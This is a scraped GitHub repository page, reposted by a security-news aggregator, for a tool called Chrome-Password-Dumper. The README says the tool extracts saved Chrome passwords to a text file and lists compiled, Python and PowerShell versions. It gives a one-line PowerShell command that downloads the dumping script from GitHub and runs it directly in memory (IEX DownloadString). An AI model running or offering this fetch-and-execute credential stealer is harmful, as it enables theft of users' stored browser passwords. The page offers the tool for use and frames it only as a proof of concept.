roflsandwich/Chrome-Password-Dumper
2019-09-30 23:18:08 Author: github.com(查看原文) 阅读量:423 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

No description, website, or topics provided.

PowerShell

Branch: master
Clone or download

Clone with HTTPS

Use Git or checkout with SVN using the web URL.

Launching GitHub Desktop...

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop...

If nothing happens, download GitHub Desktop and try again.

Launching Xcode...

If nothing happens, download Xcode and try again.

Launching Visual Studio...

If nothing happens, download the GitHub extension for Visual Studio and try again.

Fetching latest commit…

Cannot retrieve the latest commit at this time.

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md
chrome.exe
chrome.ps1
chrome.py
chromev2.ps1

README.md

For Windows version simply run chrome.exe to dump the passwords to a text file.

For powershell version:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/roflsandwich/Chrome-Password-Dumper/master/chromev2.ps1')

Chrome must be closed before running the PoC

  • chrome.py uncompiled version

  • chrome.exe - compiled with py2exe

  • chrome.ps1 - powershell version

  • chromev2.ps1 - powershell version with a process check for chrome.


文章来源: https://github.com/roflsandwich/Chrome-Password-Dumper
如有侵权请联系:admin#unsafe.sh